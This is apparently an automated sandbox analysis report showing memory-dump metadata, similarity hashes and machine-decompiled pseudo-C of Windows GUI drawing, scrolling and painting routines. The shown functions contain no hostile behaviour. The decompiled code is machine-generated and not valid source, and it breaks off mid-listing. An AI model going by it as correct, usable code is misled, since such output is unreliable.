                                                                        0x0045ceaa
                                                                        0x0045ceb1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0045ceb3
                                                                        0x0045ceb5
                                                                        0x0045ceb9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0045ceb9
                                                                        0x0045ce4d
                                                                        0x00000000
                                                                        0x0045d0cc
                                                                        0x0045d0db
                                                                        0x0045d0de
                                                                        0x0045d0de
                                                                        0x0045d0de
                                                                        0x00000000
                                                                        0x0045d0de
                                                                        0x00000000
                                                                        0x0045d0f4
                                                                        0x0045d100

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c8be4bc43f859d8c8afe2417128a037c4a7ad764e5036389b60e49141e276708
                                                                        • Instruction ID: a23f4c26fc7a9db08ee943cacd5cbd9e35e16fa5ad328059b8dc8150b4b01441
                                                                        • Opcode Fuzzy Hash: c8be4bc43f859d8c8afe2417128a037c4a7ad764e5036389b60e49141e276708
                                                                        • Instruction Fuzzy Hash: 6FB11A75A002599FDB10DF58C489BDEB7F5AF09309F1440A6EC44AB3A2C778AC4ACB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0044F614, Relevance: 7.7, APIs: 5, Instructions: 171COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 89%
                                                                        			E0044F614(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				signed char _t92;
				int _t98;
				int _t100;
				intOrPtr _t117;
				int _t122;
				intOrPtr _t155;
				void* _t164;
				signed char _t180;
				intOrPtr _t182;
				intOrPtr _t194;
				int _t199;
				intOrPtr _t203;
				void* _t204;

				_t204 = __eflags;
				_t196 = __edi;
				_t202 = _t203;
				_v8 = __eax;
				E0043961C(_v8);
				_push(_t203);
				_push(0x44f86a);
				_push( *[fs:edx]);
				 *[fs:edx] = _t203;
				 *(_v8 + 0x268) = 0;
				 *(_v8 + 0x26c) = 0;
				 *(_v8 + 0x270) = 0;
				_t164 = 0;
				_t92 =  *0x496709; // 0x0
				 *(_v8 + 0x234) = _t92 ^ 0x00000001;
				E00438D8C(_v8, 0, __edx, _t204);
				if( *(_v8 + 0x25c) == 0 ||  *(_v8 + 0x270) <= 0) {
					L12:
					_t98 =  *(_v8 + 0x268);
					_t213 = _t98;
					if(_t98 > 0) {
						E00435FC8(_v8, _t98, _t196, _t213);
					}
					_t100 =  *(_v8 + 0x26c);
					_t214 = _t100;
					if(_t100 > 0) {
						E0043600C(_v8, _t100, _t196, _t214);
					}
					_t180 =  *0x44f878; // 0x0
					 *(_v8 + 0x98) = _t180;
					_t215 = _t164;
					if(_t164 == 0) {
						E0044EB7C(_v8, 1, 1);
						E0043C730(_v8, 1, 1, _t215);
					}
					E00437760(_v8, 0, 0xb03d, 0);
					_pop(_t182);
					 *[fs:eax] = _t182;
					_push(0x44f871);
					return E00439624(_v8);
				} else {
					if(( *(_v8 + 0x98) & 0x00000010) != 0) {
						_t194 =  *0x496c08; // 0x217094c
						if( *(_v8 + 0x25c) !=  *((intOrPtr*)(_t194 + 0x40))) {
							_t155 =  *0x496c08; // 0x217094c
							E0041F64C( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E0041F644( *((intOrPtr*)(_v8 + 0x68))),  *(_t155 + 0x40),  *(_v8 + 0x25c)), __edi, _t202);
						}
					}
					_t117 =  *0x496c08; // 0x217094c
					 *(_v8 + 0x25c) =  *(_t117 + 0x40);
					_t199 = E0044F99C(_v8);
					_t122 =  *(_v8 + 0x270);
					_t209 = _t199 - _t122;
					if(_t199 != _t122) {
						_t164 = 1;
						E0044EB7C(_v8, _t122, _t199);
						E0043C730(_v8,  *(_v8 + 0x270), _t199, _t209);
						if(( *(_v8 + 0x98) & 0x00000004) != 0) {
							 *(_v8 + 0x268) = MulDiv( *(_v8 + 0x268), _t199,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000008) != 0) {
							 *(_v8 + 0x26c) = MulDiv( *(_v8 + 0x26c), _t199,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000020) != 0) {
							 *(_v8 + 0x1fa) = MulDiv( *(_v8 + 0x1fa), _t199,  *(_v8 + 0x270));
							 *(_v8 + 0x1fe) = MulDiv( *(_v8 + 0x1fe), _t199,  *(_v8 + 0x270));
						}
					}
					goto L12;
				}
			}

















                                                                        0x0044f614
                                                                        0x0044f614
                                                                        0x0044f615
                                                                        0x0044f61c
                                                                        0x0044f622
                                                                        0x0044f629
                                                                        0x0044f62a
                                                                        0x0044f62f
                                                                        0x0044f632
                                                                        0x0044f63a
                                                                        0x0044f645
                                                                        0x0044f650
                                                                        0x0044f656
                                                                        0x0044f658
                                                                        0x0044f662
                                                                        0x0044f66d
                                                                        0x0044f67c
                                                                        0x0044f7de
                                                                        0x0044f7e1
                                                                        0x0044f7e7
                                                                        0x0044f7e9
                                                                        0x0044f7f0
                                                                        0x0044f7f0
                                                                        0x0044f7f8
                                                                        0x0044f7fe
                                                                        0x0044f800
                                                                        0x0044f807
                                                                        0x0044f807
                                                                        0x0044f80f
                                                                        0x0044f815
                                                                        0x0044f81b
                                                                        0x0044f81d
                                                                        0x0044f82c
                                                                        0x0044f83e
                                                                        0x0044f83e
                                                                        0x0044f84f
                                                                        0x0044f856
                                                                        0x0044f859
                                                                        0x0044f85c
                                                                        0x0044f869
                                                                        0x0044f692
                                                                        0x0044f69c
                                                                        0x0044f6a7
                                                                        0x0044f6b0
                                                                        0x0044f6bc
                                                                        0x0044f6dc
                                                                        0x0044f6dc
                                                                        0x0044f6b0
                                                                        0x0044f6e1
                                                                        0x0044f6ec
                                                                        0x0044f6fa
                                                                        0x0044f6ff
                                                                        0x0044f705
                                                                        0x0044f707
                                                                        0x0044f70d
                                                                        0x0044f716
                                                                        0x0044f729
                                                                        0x0044f738
                                                                        0x0044f757
                                                                        0x0044f757
                                                                        0x0044f767
                                                                        0x0044f786
                                                                        0x0044f786
                                                                        0x0044f796
                                                                        0x0044f7b5
                                                                        0x0044f7d8
                                                                        0x0044f7d8
                                                                        0x0044f796
                                                                        0x00000000
                                                                        0x0044f707

                                                                        APIs
                                                                        • MulDiv.KERNEL32(00000000,?,00000000), ref: 0044F6D3
                                                                        • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044F74F
                                                                        • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044F77E
                                                                        • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044F7AD
                                                                        • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044F7D0
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f83b6f54dddd89dbe0c70f2b225cc0d110cc9cf3e54e16450356abb0dd6b52aa
                                                                        • Instruction ID: b7fbed5c6db0269f7e2fea028abd8eb97cbe5c16f41f339bba14ab5bac44c86c
                                                                        • Opcode Fuzzy Hash: f83b6f54dddd89dbe0c70f2b225cc0d110cc9cf3e54e16450356abb0dd6b52aa
                                                                        • Instruction Fuzzy Hash: 2D71D574A04104EFDB00DBA9C589EADB3F5AF49304F2541F6E808EB362C739AE45DB44
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0045EFF4, Relevance: 7.7, APIs: 5, Instructions: 168COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 87%
                                                                        			E0045EFF4(void* __eax, int __ecx, signed int __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				struct tagRECT _v28;
				char _v44;
				int _t90;
				void* _t109;
				void* _t125;
				void* _t131;
				intOrPtr _t142;
				int _t143;

				_t143 = __ecx;
				_v8 = __edx;
				_t125 = __eax;
				_t142 = _a4;
				_v12 = 2;
				if( *((char*)(__eax + 0x28c)) == 0) {
					_v12 = _v12 | 0x00000004;
				}
				_t147 = _t143;
				if(_t143 != 0) {
					__eflags = _v8;
					if(_v8 != 0) {
						_t29 = _t142 + 0x34; // 0xe89c933
						_t31 = _t142 + 0xc; // 0x895653ec
						E00412BCC( *_t31, 0,  &_v28,  *_t29);
						ScrollWindowEx(E0043CC2C(_t125), _v8, 0,  &_v28,  &_v28, 0, 0, _v12);
						_t37 = _t142 + 0x3c; // 0x55894233
						_t39 = _t142 + 4; // 0x55c35b5e
						_t40 = _t142 + 0x34; // 0xe89c933
						__eflags = 0;
						E00412BCC( *_t39,  *_t40,  &_v28,  *_t37);
						ScrollWindowEx(E0043CC2C(_t125), 0, _t143,  &_v28,  &_v28, 0, 0, _v12);
						_t44 = _t142 + 0x3c; // 0x55894233
						_t46 = _t142 + 0xc; // 0x895653ec
						_t47 = _t142 + 0x34; // 0xe89c933
						E00412BCC( *_t46,  *_t47,  &_v28,  *_t44);
						_t90 = ScrollWindowEx(E0043CC2C(_t125), _v8, _t143,  &_v28,  &_v28, 0, 0, _v12);
					} else {
						_t22 = _t142 + 0x3c; // 0x55894233
						_t24 = _t142 + 0xc; // 0x895653ec
						_t25 = _t142 + 0x34; // 0xe89c933
						E00412BCC( *_t24,  *_t25,  &_v28,  *_t22);
						_t90 = ScrollWindowEx(E0043CC2C(_t125), 0, _t143,  &_v28,  &_v28, 0, 0, _v12);
					}
				} else {
					if(E004037D8(_t125, _t147) != 0) {
						_t11 = _t142 + 0x3c; // 0x55894233
						_push( *_t11);
						_push( &_v28);
						_t109 = E00435FB0(_t125);
						_t13 = _t142 + 4; // 0x55c35b5e
						_push(_t109 -  *_t13);
						E00435FB0(_t125);
						__eflags = 0;
						_pop(_t131);
						E00412BCC(_t131, 0);
						_v8 =  ~_v8;
					} else {
						_t7 = _t142 + 0x3c; // 0x55894233
						_t9 = _t142 + 0xc; // 0x895653ec
						E00412BCC( *_t9, 0,  &_v28,  *_t7);
					}
					_t90 = ScrollWindowEx(E0043CC2C(_t125), _v8, 0,  &_v28,  &_v28, 0, 0, _v12);
				}
				_t149 =  *(_t125 + 0x249) & 0x00000010;
				if(( *(_t125 + 0x249) & 0x00000010) == 0) {
					return _t90;
				} else {
					E00460800(_t125,  &_v44);
					return E0045E6F0(_t125,  &_v44, _t149);
				}
			}













                                                                        0x0045effd
                                                                        0x0045efff
                                                                        0x0045f002
                                                                        0x0045f004
                                                                        0x0045f007
                                                                        0x0045f015
                                                                        0x0045f017
                                                                        0x0045f017
                                                                        0x0045f01b
                                                                        0x0045f01d
                                                                        0x0045f095
                                                                        0x0045f099
                                                                        0x0045f0d5
                                                                        0x0045f0dd
                                                                        0x0045f0e5
                                                                        0x0045f108
                                                                        0x0045f10d
                                                                        0x0045f115
                                                                        0x0045f118
                                                                        0x0045f11b
                                                                        0x0045f11d
                                                                        0x0045f13d
                                                                        0x0045f142
                                                                        0x0045f14a
                                                                        0x0045f14d
                                                                        0x0045f153
                                                                        0x0045f175
                                                                        0x0045f09b
                                                                        0x0045f09b
                                                                        0x0045f0a3
                                                                        0x0045f0a6
                                                                        0x0045f0ab
                                                                        0x0045f0cb
                                                                        0x0045f0cb
                                                                        0x0045f01f
                                                                        0x0045f02c
                                                                        0x0045f045
                                                                        0x0045f048
                                                                        0x0045f04c
                                                                        0x0045f04f
                                                                        0x0045f054
                                                                        0x0045f057
                                                                        0x0045f05a
                                                                        0x0045f062
                                                                        0x0045f064
                                                                        0x0045f065
                                                                        0x0045f06a
                                                                        0x0045f02e
                                                                        0x0045f02e
                                                                        0x0045f036
                                                                        0x0045f03e
                                                                        0x0045f03e
                                                                        0x0045f08b
                                                                        0x0045f08b
                                                                        0x0045f17a
                                                                        0x0045f181
                                                                        0x0045f19d
                                                                        0x0045f183
                                                                        0x0045f188
                                                                        0x00000000
                                                                        0x0045f192

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: ScrollWindow
                                                                        • String ID:
                                                                        • API String ID: 2126015319-0
                                                                        • Opcode ID: 012e01d2e5b07f3e9b05cfdc662a801196811393e83e2eaebac9e87f70118fcb
                                                                        • Instruction ID: 7e4e7f4e2f5f89522f6d3bfcac37a2a193213212823b79a250b46dc624b20d20
                                                                        • Opcode Fuzzy Hash: 012e01d2e5b07f3e9b05cfdc662a801196811393e83e2eaebac9e87f70118fcb
                                                                        • Instruction Fuzzy Hash: EF51E171600509BBD700EEA5CD82FEFB7ACAF08304F405526BA05E7682DB74F955CBA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004469BC, Relevance: 7.7, APIs: 5, Instructions: 162COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 85%
                                                                        			E004469BC(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, int _a4, char _a8, struct tagRECT* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				struct tagRECT _v32;
				void* _t53;
				int _t63;
				CHAR* _t65;
				void* _t76;
				void* _t78;
				int _t89;
				CHAR* _t91;
				int _t117;
				intOrPtr _t127;
				void* _t139;
				void* _t144;
				char _t153;

				_t120 = __ecx;
				_t143 = _t144;
				_v16 = 0;
				_v12 = __ecx;
				_v8 = __edx;
				_t139 = __eax;
				_t117 = _a4;
				_push(_t144);
				_push(0x446ba0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t144 + 0xffffffe4;
				_t53 = E00448820(__eax);
				_t135 = _t53;
				if(_t53 != 0 && E00449E5C(_t135) != 0) {
					if((_t117 & 0x00000000) != 0) {
						__eflags = (_t117 & 0x00000002) - 2;
						if((_t117 & 0x00000002) == 2) {
							_t117 = _t117 & 0xfffffffd;
							__eflags = _t117;
						}
					} else {
						_t117 = _t117 & 0xffffffff | 0x00000002;
					}
					_t117 = _t117 | 0x00020000;
				}
				E004043E0( &_v16, _v12);
				if((_t117 & 0x00000004) == 0) {
					L12:
					E00404744(_v16, 0x446bc4);
					if(_t153 != 0) {
						E0041FD6C( *((intOrPtr*)(_v8 + 0x14)), _t120, 1, _t135, _t143, __eflags);
						__eflags =  *((char*)(_t139 + 0x3a));
						if( *((char*)(_t139 + 0x3a)) != 0) {
							_t136 =  *((intOrPtr*)(_v8 + 0xc));
							__eflags = E0041F724( *((intOrPtr*)(_v8 + 0xc))) |  *0x446bc8;
							E0041F730( *((intOrPtr*)(_v8 + 0xc)), E0041F724( *((intOrPtr*)(_v8 + 0xc))) |  *0x446bc8, _t136, _t139, _t143);
						}
						__eflags =  *((char*)(_t139 + 0x39));
						if( *((char*)(_t139 + 0x39)) != 0) {
							L24:
							_t63 = E00404600(_v16);
							_t65 = E004047F8(_v16);
							DrawTextA(E00420730(_v8), _t65, _t63, _a12, _t117);
							L25:
							_pop(_t127);
							 *[fs:eax] = _t127;
							_push(0x446ba7);
							return E00404348( &_v16);
						} else {
							__eflags = _a8;
							if(_a8 == 0) {
								OffsetRect(_a12, 1, 1);
								E0041F464( *((intOrPtr*)(_v8 + 0xc)), 0x80000014);
								_t89 = E00404600(_v16);
								_t91 = E004047F8(_v16);
								DrawTextA(E00420730(_v8), _t91, _t89, _a12, _t117);
								OffsetRect(_a12, 0xffffffff, 0xffffffff);
							}
							__eflags = _a8;
							if(_a8 == 0) {
								L23:
								E0041F464( *((intOrPtr*)(_v8 + 0xc)), 0x80000010);
							} else {
								_t76 = E0041EFA4(0x8000000d);
								_t78 = E0041EFA4(0x80000010);
								__eflags = _t76 - _t78;
								if(_t76 != _t78) {
									goto L23;
								}
								E0041F464( *((intOrPtr*)(_v8 + 0xc)), 0x80000014);
							}
							goto L24;
						}
					}
					if((_t117 & 0x00000004) == 0) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_v32.top = _v32.top + 4;
						DrawEdge(E00420730(_v8),  &_v32, 6, 2);
					}
					goto L25;
				} else {
					if(_v16 == 0) {
						L11:
						E00404608( &_v16, 0x446bb8);
						goto L12;
					}
					if( *_v16 != 0x26) {
						goto L12;
					}
					_t153 =  *((char*)(_v16 + 1));
					if(_t153 != 0) {
						goto L12;
					}
					goto L11;
				}
			}



















                                                                        0x004469bc
                                                                        0x004469bd
                                                                        0x004469c7
                                                                        0x004469ca
                                                                        0x004469cd
                                                                        0x004469d0
                                                                        0x004469d2
                                                                        0x004469d7
                                                                        0x004469d8
                                                                        0x004469dd
                                                                        0x004469e0
                                                                        0x004469e5
                                                                        0x004469ea
                                                                        0x004469ee
                                                                        0x004469fe
                                                                        0x00446a0d
                                                                        0x00446a10
                                                                        0x00446a15
                                                                        0x00446a15
                                                                        0x00446a15
                                                                        0x00446a00
                                                                        0x00446a03
                                                                        0x00446a03
                                                                        0x00446a18
                                                                        0x00446a18
                                                                        0x00446a24
                                                                        0x00446a2c
                                                                        0x00446a52
                                                                        0x00446a5a
                                                                        0x00446a5f
                                                                        0x00446a9d
                                                                        0x00446aa2
                                                                        0x00446aa6
                                                                        0x00446aab
                                                                        0x00446ab7
                                                                        0x00446abf
                                                                        0x00446abf
                                                                        0x00446ac4
                                                                        0x00446ac8
                                                                        0x00446b65
                                                                        0x00446b6d
                                                                        0x00446b76
                                                                        0x00446b85
                                                                        0x00446b8a
                                                                        0x00446b8c
                                                                        0x00446b8f
                                                                        0x00446b92
                                                                        0x00446b9f
                                                                        0x00446ace
                                                                        0x00446ace
                                                                        0x00446ad2
                                                                        0x00446adc
                                                                        0x00446aec
                                                                        0x00446af9
                                                                        0x00446b02
                                                                        0x00446b11
                                                                        0x00446b1e
                                                                        0x00446b1e
                                                                        0x00446b23
                                                                        0x00446b27
                                                                        0x00446b55
                                                                        0x00446b60
                                                                        0x00446b29
                                                                        0x00446b2e
                                                                        0x00446b3a
                                                                        0x00446b3f
                                                                        0x00446b41
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00446b4e
                                                                        0x00446b4e
                                                                        0x00000000
                                                                        0x00446b27
                                                                        0x00446ac8
                                                                        0x00446a64
                                                                        0x00446a72
                                                                        0x00446a73
                                                                        0x00446a74
                                                                        0x00446a75
                                                                        0x00446a76
                                                                        0x00446a8b
                                                                        0x00446a8b
                                                                        0x00000000
                                                                        0x00446a2e
                                                                        0x00446a32
                                                                        0x00446a45
                                                                        0x00446a4d
                                                                        0x00000000
                                                                        0x00446a4d
                                                                        0x00446a3a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00446a3f
                                                                        0x00446a43
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00446a43

                                                                        APIs
                                                                        • DrawEdge.USER32(00000000,?,00000006,00000002), ref: 00446A8B
                                                                        • OffsetRect.USER32(?,00000001,00000001), ref: 00446ADC
                                                                        • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00446B11
                                                                        • OffsetRect.USER32(?,000000FF,000000FF), ref: 00446B1E
                                                                        • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00446B85
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Draw$OffsetRectText$Edge
                                                                        • String ID:
                                                                        • API String ID: 3610532707-0
                                                                        • Opcode ID: 85062a5ebc0655283848f6502ddf073e01523f4b758b7f32a43d0701a49e740e
                                                                        • Instruction ID: 6b641bb0bc6ef2255d17c86df0a205ba80bac31eaa022483ee7a4ef997933482
                                                                        • Opcode Fuzzy Hash: 85062a5ebc0655283848f6502ddf073e01523f4b758b7f32a43d0701a49e740e
                                                                        • Instruction Fuzzy Hash: 9E516770A006446FEB10EBA9C881B9F77E5DF46314F15816AF914F7391C73CAD418B1A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0042B85C, Relevance: 7.6, APIs: 5, Instructions: 110COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 77%
                                                                        			E0042B85C(intOrPtr* __eax, void* __ebx, signed int __ecx, struct tagRECT* __edx, void* __edi, void* __esi) {
				char _v8;
				int _t40;
				CHAR* _t42;
				int _t54;
				CHAR* _t56;
				int _t65;
				CHAR* _t67;
				intOrPtr* _t76;
				intOrPtr _t86;
				struct tagRECT* _t91;
				signed int _t93;
				int _t94;
				intOrPtr _t97;
				signed int _t104;

				_push(0);
				_t93 = __ecx;
				_t91 = __edx;
				_t76 = __eax;
				_push(_t97);
				_push(0x42b9b2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t97;
				 *((intOrPtr*)( *__eax + 0x90))();
				if((__ecx & 0x00000400) != 0 && (_v8 == 0 ||  *((char*)(__eax + 0x170)) != 0 &&  *_v8 == 0x26 &&  *((char*)(_v8 + 1)) == 0)) {
					E00404608( &_v8, 0x42b9c8);
				}
				if( *((char*)(_t76 + 0x170)) == 0) {
					_t104 = _t93;
				}
				_t94 = E00438890(_t76, _t93, _t104);
				E0042062C( *((intOrPtr*)(_t76 + 0x160)));
				if( *((intOrPtr*)( *_t76 + 0x50))() != 0) {
					_t40 = E00404600(_v8);
					_t42 = E004047F8(_v8);
					DrawTextA(E00420730( *((intOrPtr*)(_t76 + 0x160))), _t42, _t40, _t91, _t94);
				} else {
					OffsetRect(_t91, 1, 1);
					E0041F464( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x160)) + 0xc)), 0x80000014);
					_t54 = E00404600(_v8);
					_t56 = E004047F8(_v8);
					DrawTextA(E00420730( *((intOrPtr*)(_t76 + 0x160))), _t56, _t54, _t91, _t94);
					OffsetRect(_t91, 0xffffffff, 0xffffffff);
					E0041F464( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x160)) + 0xc)), 0x80000010);
					_t65 = E00404600(_v8);
					_t67 = E004047F8(_v8);
					DrawTextA(E00420730( *((intOrPtr*)(_t76 + 0x160))), _t67, _t65, _t91, _t94);
				}
				_pop(_t86);
				 *[fs:eax] = _t86;
				_push(0x42b9b9);
				return E00404348( &_v8);
			}

















                                                                        0x0042b85f
                                                                        0x0042b864
                                                                        0x0042b866
                                                                        0x0042b868
                                                                        0x0042b86c
                                                                        0x0042b86d
                                                                        0x0042b872
                                                                        0x0042b875
                                                                        0x0042b87f
                                                                        0x0042b88b
                                                                        0x0042b8b5
                                                                        0x0042b8b5
                                                                        0x0042b8c1
                                                                        0x0042b8c3
                                                                        0x0042b8c3
                                                                        0x0042b8d2
                                                                        0x0042b8dd
                                                                        0x0042b8eb
                                                                        0x0042b97c
                                                                        0x0042b985
                                                                        0x0042b997
                                                                        0x0042b8f1
                                                                        0x0042b8f6
                                                                        0x0042b909
                                                                        0x0042b913
                                                                        0x0042b91c
                                                                        0x0042b92e
                                                                        0x0042b938
                                                                        0x0042b94b
                                                                        0x0042b955
                                                                        0x0042b95e
                                                                        0x0042b970
                                                                        0x0042b970
                                                                        0x0042b99e
                                                                        0x0042b9a1
                                                                        0x0042b9a4
                                                                        0x0042b9b1

                                                                        APIs
                                                                        • OffsetRect.USER32(?,00000001,00000001), ref: 0042B8F6
                                                                        • DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0042B92E
                                                                        • OffsetRect.USER32(?,000000FF,000000FF), ref: 0042B938
                                                                        • DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0042B970
                                                                        • DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0042B997
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: DrawText$OffsetRect
                                                                        • String ID:
                                                                        • API String ID: 1886049697-0
                                                                        • Opcode ID: 662b6b3a40582923ac273cb24c9d502d2feb4a56df99f8a9edd9d85c2ba6a157
                                                                        • Instruction ID: 1d1b475f9fabfd745f91b6a763abeaaa6df454c933534dc2db13d73f98644ccc
                                                                        • Opcode Fuzzy Hash: 662b6b3a40582923ac273cb24c9d502d2feb4a56df99f8a9edd9d85c2ba6a157
                                                                        • Instruction Fuzzy Hash: 91318470B04214AFDB11FB69DC85B8B77E9EF45314F5140BAF908EB292CB79AD009768
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0043A97C, Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 85%
                                                                        			E0043A97C(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagPAINTSTRUCT _v84;
				intOrPtr _t55;
				void* _t64;
				struct HDC__* _t75;
				intOrPtr _t84;
				void* _t95;
				void* _t96;
				void* _t98;
				void* _t100;
				void* _t101;
				intOrPtr _t102;

				_t100 = _t101;
				_t102 = _t101 + 0xffffffb0;
				_v12 = __edx;
				_v8 = __eax;
				_t75 =  *(_v12 + 4);
				if(_t75 == 0) {
					_t75 = BeginPaint(E0043CC2C(_v8),  &_v84);
				}
				_push(_t100);
				_push(0x43aa9c);
				_push( *[fs:edx]);
				 *[fs:edx] = _t102;
				if( *((intOrPtr*)(_v8 + 0x198)) != 0) {
					_v20 = SaveDC(_t75);
					_v16 = 2;
					_t95 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x198)) + 8)) - 1;
					if(_t95 >= 0) {
						_t96 = _t95 + 1;
						_t98 = 0;
						do {
							_t64 = E00414208( *((intOrPtr*)(_v8 + 0x198)), _t98);
							if( *((char*)(_t64 + 0x57)) != 0 || ( *(_t64 + 0x1c) & 0x00000010) != 0 && ( *(_t64 + 0x51) & 0x00000004) == 0) {
								if(( *(_t64 + 0x50) & 0x00000040) == 0) {
									goto L11;
								} else {
									_v16 = ExcludeClipRect(_t75,  *(_t64 + 0x40),  *(_t64 + 0x44),  *(_t64 + 0x40) +  *((intOrPtr*)(_t64 + 0x48)),  *(_t64 + 0x44) +  *((intOrPtr*)(_t64 + 0x4c)));
									if(_v16 != 1) {
										goto L11;
									}
								}
							} else {
								goto L11;
							}
							goto L12;
							L11:
							_t98 = _t98 + 1;
							_t96 = _t96 - 1;
						} while (_t96 != 0);
					}
					L12:
					if(_v16 != 1) {
						 *((intOrPtr*)( *_v8 + 0xb8))();
					}
					RestoreDC(_t75, _v20);
				} else {
					 *((intOrPtr*)( *_v8 + 0xb8))();
				}
				E0043AAD8(_v8, 0, _t75);
				_pop(_t84);
				 *[fs:eax] = _t84;
				_push(0x43aaa3);
				_t55 = _v12;
				if( *((intOrPtr*)(_t55 + 4)) == 0) {
					return EndPaint(E0043CC2C(_v8),  &_v84);
				}
				return _t55;
			}


















                                                                        0x0043a97d
                                                                        0x0043a97f
                                                                        0x0043a985
